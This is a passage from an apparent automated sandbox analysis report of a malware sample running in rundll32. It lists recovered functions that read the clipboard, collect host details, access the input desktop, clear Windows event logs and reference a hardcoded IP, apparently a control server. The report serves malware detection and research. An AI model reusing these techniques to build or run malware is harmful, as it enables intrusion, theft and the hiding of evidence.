WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041770B2
CloseHandle.KERNEL32(?), ref: 041770C8
Sleep.KERNEL32(00000001), ref: 041770D0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 041770DC
FreeLibrary.KERNEL32(00000000), ref: 041770F1

Strings

InternetReadFile, xrefs: 04177076
InternetCloseHandle, xrefs: 041770D6

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
String ID: InternetCloseHandle$InternetReadFile
API String ID: 586530251-535091292
Opcode ID: dc273fbbbdfabe85aeff23ed4e1d3783a3263076f8d12d80747c51631ba9c27c
Instruction ID: 8fea42aa1be9bbc41055c967aab0d7bec6733a434082c43a0bb5f1781cba7aa4
Opcode Fuzzy Hash: dc273fbbbdfabe85aeff23ed4e1d3783a3263076f8d12d80747c51631ba9c27c
Instruction Fuzzy Hash: 9C1133F6550218ABDB20EBA4DC85FEEB37CEF84700F004188F705A7181DB786A868F65

Function 04175070 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04175098
GetComputerNameA.KERNEL32(00000000,?), ref: 041750B8
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041750CE
_memset.LIBCMT ref: 041750E2
wsprintfA.USER32 ref: 041750FA
lstrlenA.KERNEL32(?,00000000), ref: 04175106

Strings

UnKnow, xrefs: 041750C2
Time, xrefs: 0417510E
SOFTWARE\%s\, xrefs: 041750F4

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
String ID: SOFTWARE\%s\$Time$UnKnow
API String ID: 3529005902-722125974
Opcode ID: ae35c05c3e8d2c150f232ef70d304dc38baf5d4b6739b142e1f0230638ac572b
Instruction ID: d2a54a0a9bdf7156e4a5a9024703edffe4ccef0fa01b4e7ea41109bbdc6fa36f
Opcode Fuzzy Hash: ae35c05c3e8d2c150f232ef70d304dc38baf5d4b6739b142e1f0230638ac572b
Instruction Fuzzy Hash: D51194B1990208ABE720EB64DC49F9A737CEB44704F0040D8E609A2081EB756AA8CBA0

Function 041735C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,161FA605), ref: 041735F5
GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 0417360C
GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 04173616
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 0417361E

Part of subcall function 04173370: LoadLibraryA.KERNEL32(user32.dll,161FA605), ref: 041733BA
Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 041733D0
Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 041733DE
Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 041733EC
Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 041733FA
Part of subcall function 04173370: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04173407
Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04173417

Strings

OpenDesktopA, xrefs: 04173610
user32.dll, xrefs: 041735F0
OpenInputDesktop, xrefs: 04173600
CloseDesktop, xrefs: 04173618

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: b9606598ad8b805cd091e2c72aaa1982394d60e3ac438c82a32fdb5d6e4015c0
Instruction ID: 356b9397244eeb16e43cf693729ced6052f44717c9644e5b7f856eb0b1a063fc
Opcode Fuzzy Hash: b9606598ad8b805cd091e2c72aaa1982394d60e3ac438c82a32fdb5d6e4015c0
Instruction Fuzzy Hash: 3F118671A44318ABD7109FA99CC5B9FBBF8FB45654F10012AF915E7380DB7479008E65

Function 041935D8 Relevance: 13.7, APIs: 9, Instructions: 235COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0419361C
_strncpy.LIBCMT ref: 04193639

Part of subcall function 041943F8: _memset.LIBCMT ref: 04194417
Part of subcall function 041943F8: _memset.LIBCMT ref: 04194431
Part of subcall function 041943F8: _memset.LIBCMT ref: 0419447B

_strncpy.LIBCMT ref: 04193684
_strncpy.LIBCMT ref: 0419374E
_strncpy.LIBCMT ref: 04193765
_strncpy.LIBCMT ref: 041937D9
_strncpy.LIBCMT ref: 04193820
_memset.LIBCMT ref: 0419383D
_strncpy.LIBCMT ref: 04193888

Part of subcall function 04181058: std::_Xinvalid_argument.LIBCPMT ref: 0418106E

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _strncpy$_memset$Xinvalid_argumentstd::_
String ID:
API String ID: 3894514434-0
Opcode ID: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
Instruction ID: 936218522b196335e23bd80db3d4ccf93fbd9ad5bdc91d1adac41037c1ad9319
Opcode Fuzzy Hash: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
Instruction Fuzzy Hash: 4781FCB2D002286BEF25EB648CC5BED77B8EB58300F4446D9E919A7240DB34AF45CF95

Function 04176620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 182threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18

_memset.LIBCMT ref: 04176668
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04176759
CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00016200,00000000,00000000), ref: 04176779
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0417678A
CloseHandle.KERNEL32(?), ref: 04176797
CreateThread.KERNEL32(00000000,00000000,Function_00016200,00000000,00000000,00000000), ref: 04176845

Strings

yxxx, xrefs: 04176697

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
String ID: yxxx
API String ID: 3710809023-3567846162
Opcode ID: fb886a17815d051c32206671f2c6bc07212c778915a2b68ec02ca96868befb8a
Instruction ID: 39e03d670faedb1a521eda84ce08c7f772ebd1d93ebfce84fc09ec383acac6f4
Opcode Fuzzy Hash: fb886a17815d051c32206671f2c6bc07212c778915a2b68ec02ca96868befb8a
Instruction Fuzzy Hash: 30610771E002189BDB24DF64CCC1BD9B7B5EB48314F0441E9EA49AB381DB75BE94CB90

Function 04173EF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04173F0C
_memset.LIBCMT ref: 04173F1D

Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DC6
Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DD9
Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DEC
Part of subcall function 04174D60: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174DF9
Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04174E13
Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04174E21
Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04174E2F
Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04174E37
Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04174E3F
Part of subcall function 04174D60: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174E6C
Part of subcall function 04174D60: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,161FA605,?,Enable,?), ref: 04175003

lstrlenA.KERNEL32(00000000), ref: 04173F44
lstrcpyA.KERNEL32(041A8138,UnKnow), ref: 04173F5E

Strings

ProcessorNameString, xrefs: 04173F26
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 04173F33
UnKnow, xrefs: 04173F54

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$UnKnow
API String ID: 91903147-1449962935
Opcode ID: 0967e0c508ca2739266bd997467659e941e0e2c99ba40870ba967ab8eb2bef04
Instruction ID: a2ffcbd5c86852f6968e4a9a651cb1457da706161c691bf9c46ade2173993e69
Opcode Fuzzy Hash: 0967e0c508ca2739266bd997467659e941e0e2c99ba40870ba967ab8eb2bef04
Instruction Fuzzy Hash: 5D01867479430CABF710EBE58DC6F5D7374EB44B48F604058B6067A1C4EBB4BA28CA56

Function 041737E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 041737EC
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04173807
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04173811
FreeLibrary.KERNEL32(00000000), ref: 04173825

Strings

IsWow64Process, xrefs: 041737FA
kernel32.dll, xrefs: 041737E7
GetCurrentProcess, xrefs: 04173809

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
API String ID: 2256533930-2522683910
Opcode ID: 7cd54fa6234d568c269d4e3bbaa5e7ecba65da4efa8355fd854b49c02efe820f
Instruction ID: 492cac637e46fde83ecfaae8fe121d9d676d848432b6dae119fe9ef49b506047
Opcode Fuzzy Hash: 7cd54fa6234d568c269d4e3bbaa5e7ecba65da4efa8355fd854b49c02efe820f
Instruction Fuzzy Hash: 79F0EC7656531CBBE71097A5DC84DAFB77CDF49654B100155FC14932009B79BD0086F4

Function 041760A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 041760AA
GetClipboardData.USER32(00000001), ref: 041760BA
GlobalLock.KERNEL32(00000000), ref: 041760C4
GlobalUnlock.KERNEL32(?), ref: 04176193
CloseClipboard.USER32 ref: 04176199

Strings

NULL, xrefs: 041760D0

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: NULL
API String ID: 1006321803-324932091
Opcode ID: db37cb9c9ad9b0bd1dc07498729a9cd9ecd114de25c1ccad55f0e39ff46c2166
Instruction ID: f9152ff4709463e059349f44edbebc12b02e8cd15665a61500f72a3da8037afc
Opcode Fuzzy Hash: db37cb9c9ad9b0bd1dc07498729a9cd9ecd114de25c1ccad55f0e39ff46c2166
Instruction Fuzzy Hash: 683104B5908245AFD701DF789898EDA7BF9DF85294B19C1A4E88AC7301EB34E60CC790

Function 04173E10 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 75stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18

Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB

wsprintfA.USER32 ref: 04173E84
lstrcpyA.KERNEL32(00000004,---+++***bbb,04174A7C), ref: 04173EAF
lstrcpyA.KERNEL32(00000004,81.31.208.36,04174A7C), ref: 04173ECD

Strings

Time, xrefs: 04173E14
81.31.208.36, xrefs: 04173EC4
CopyC, xrefs: 04173E25
---+++***bbb, xrefs: 04173EA6

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
String ID: ---+++***bbb$81.31.208.36$CopyC$Time
API String ID: 98932487-3096327760
Opcode ID: d3e80be16ef65f39f9a9a24a037f5b882fe32e559b0e7a54b7af3c72054d5371
Instruction ID: 882999b4c48fdcabccf271f2a6f59da54bdd799f7b9542cc1ae051d963d50725
Opcode Fuzzy Hash: d3e80be16ef65f39f9a9a24a037f5b882fe32e559b0e7a54b7af3c72054d5371
Instruction Fuzzy Hash: 1F21AD767002159BD300CF19E888BD677B9FB88315F1441A9ED49C7200EF35B81CCB91

Function 041734F0 Relevance: 10.6, APIs: 7, Instructions: 70processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,041A6A00,00000000,?,?,04173FFE), ref: 04173501

Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18

Process32First.KERNEL32(00000000,00000000), ref: 0417352A
lstrcmpiA.KERNEL32(00000024,?), ref: 0417353D
CloseHandle.KERNEL32(00000000), ref: 04173585

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
String ID:
API String ID: 2970433402-0
Opcode ID: 95b6815ed8d5365b76ca7bee348bd75fef52bef4b13260e80015783988f30b0a
Instruction ID: d9b2a1070d932c59ed25ad3f08c79cace3857b9e3a1d8fc6a29645680fb96cc8
Opcode Fuzzy Hash: 95b6815ed8d5365b76ca7bee348bd75fef52bef4b13260e80015783988f30b0a
Instruction Fuzzy Hash: 8D116671655218ABEB209F6AEC88FAB7BBCEF41751F00405DFD0A87100E774E944E7A2

Function 0416470B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0417C578,00000008,04164813,00000000,00000000,?,0416750C,00000000,00000001,00000000,?,0416B043,00000018,0417C790,0000000C), ref: 0416471C
__lock.LIBCMT ref: 04164750

Part of subcall function 0416B0B8: __mtinitlocknum.LIBCMT ref: 0416B0CE
Part of subcall function 0416B0B8: __amsg_exit.LIBCMT ref: 0416B0DA
Part of subcall function 0416B0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,041648E3,0000000D,0417C5A0,00000008,041649DA,00000000,?,04163E44,00000000,0417C518,00000008,04163EA9,?), ref: 0416B0E2

InterlockedIncrement.KERNEL32(?), ref: 0416475D
__lock.LIBCMT ref: 04164771
___addlocaleref.LIBCMT ref: 0416478F

Strings

KERNEL32.DLL, xrefs: 04164717

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 6165917fadc70c341bc1136a0925b8f1e744bb53d191fd09870039a51555aaf4
Instruction ID: 07c6c544995bd284fcceeaf360f12c02170660cc09a651aa3760f7a2731e4a92
Opcode Fuzzy Hash: 6165917fadc70c341bc1136a0925b8f1e744bb53d191fd09870039a51555aaf4
Instruction Fuzzy Hash: 2B016D71440B00AFF720EF69D589749FBF0AF41328F10894ED896A66A0CBB4FA94CF55

Function 041758D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,0417B7EC), ref: 041758FD
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 04175908
CloseEventLog.ADVAPI32(00000000), ref: 0417590F

Strings

System, xrefs: 041758ED
Application, xrefs: 041758DF
Security, xrefs: 041758E6

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 1394279800ecccef20f505d9e1ba7a1ddd390aafeba3634f50c827152cd7eb87
Instruction ID: b0178f2e64d66524bb21dba907f851d51b5984b67511c643e3391599d15dd289
Opcode Fuzzy Hash: 1394279800ecccef20f505d9e1ba7a1ddd390aafeba3634f50c827152cd7eb87
Instruction Fuzzy Hash: D1F0A076A1121477E3119B9FAD88B8FFBBCFF49214F000054EA08A3240C734A9498BA6

Function 0417256D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0417258E

Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848

__getptd.LIBCMT ref: 0417259F
__getptd.LIBCMT ref: 041725AD

Strings

MOC, xrefs: 04172580
csm, xrefs: 04172587
RCC, xrefs: 04172579

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
Instruction ID: 3abf0e8c9b687dd97b07cbe85b45acf1015a186b55fa02b37c8220007dc3aaa3
Opcode Fuzzy Hash: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
Instruction Fuzzy Hash: 05E048742501448FD7209BE8C0D97EC33E8FF88218F5610E1D44DC7232D734F8A18942

Function 04191C27 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 04191C4F

Part of subcall function 041917DF: __getptd.LIBCMT ref: 041917ED
Part of subcall function 041917DF: __getptd.LIBCMT ref: 041917FB

__getptd.LIBCMT ref: 04191C59

Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0

__getptd.LIBCMT ref: 04191C67
__getptd.LIBCMT ref: 04191C75
__getptd.LIBCMT ref: 04191C80
_CallCatchBlock2.LIBCMT ref: 04191CA6

Part of subcall function 04191884: __CallSettingFrame@12.LIBCMT ref: 041918D0

Part of subcall function 04191D4D: __getptd.LIBCMT ref: 04191D5C
Part of subcall function 04191D4D: __getptd.LIBCMT ref: 04191D6A

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
Instruction ID: d096e9f384bd7915c80f78be57c18d1943915cc736debe24a15d191c7232dfb5
Opcode Fuzzy Hash: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
Instruction Fuzzy Hash: E2119975D0020AEFEF00EFA4D588ADE77F0FF04318F548469E825AB251DB39A9559F50

Function 0417281F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 04172847

Part of subcall function 041723D7: __getptd.LIBCMT ref: 041723E5
Part of subcall function 041723D7: __getptd.LIBCMT ref: 041723F3

__getptd.LIBCMT ref: 04172851

Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848

__getptd.LIBCMT ref: 0417285F
__getptd.LIBCMT ref: 0417286D
__getptd.LIBCMT ref: 04172878
_CallCatchBlock2.LIBCMT ref: 0417289E

Part of subcall function 0417247C: __CallSettingFrame@12.LIBCMT ref: 041724C8

Part of subcall function 04172945: __getptd.LIBCMT ref: 04172954
Part of subcall function 04172945: __getptd.LIBCMT ref: 04172962

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e32059a1870f9c71ff12f063c824557cbf3df37bd7dbe28d22bd439757e7a4e5
Instruction ID: 949d6cb36e15192648acf53d453a34fab765440f989956e2fb8d943c699d11ae
Opcode Fuzzy Hash: e32059a1870f9c71ff12f063c824557cbf3df37bd7dbe28d22bd439757e7a4e5
Instruction Fuzzy Hash: 95110771C00249EFEB00EFA4D484BADBBF4FF08314F5180A9E855A7250DB38AA51DF54

Function 04167EEC Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04167EF8

Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848

__amsg_exit.LIBCMT ref: 04167F18
__lock.LIBCMT ref: 04167F28
InterlockedDecrement.KERNEL32(?), ref: 04167F45
_free.LIBCMT ref: 04167F58
InterlockedIncrement.KERNEL32(04321680), ref: 04167F70

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 81321d7a591b1c4469d7dcae5c6027c935f443f76c08d5a0db179de3aa32093a
Instruction ID: 97cde2348d5f48397743c21e537f5f68441533999b121a3d6c0067eaf5c2b5c0
Opcode Fuzzy Hash: 81321d7a591b1c4469d7dcae5c6027c935f443f76c08d5a0db179de3aa32093a
Instruction Fuzzy Hash: 63016131901725A7EB21AF65A088B5D77B1FB04728F1140C9E836AB6C0D734F9A1CBD5

Function 04194D38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04194D7D
_memset.LIBCMT ref: 04194D9A
_memset.LIBCMT ref: 04194DD4
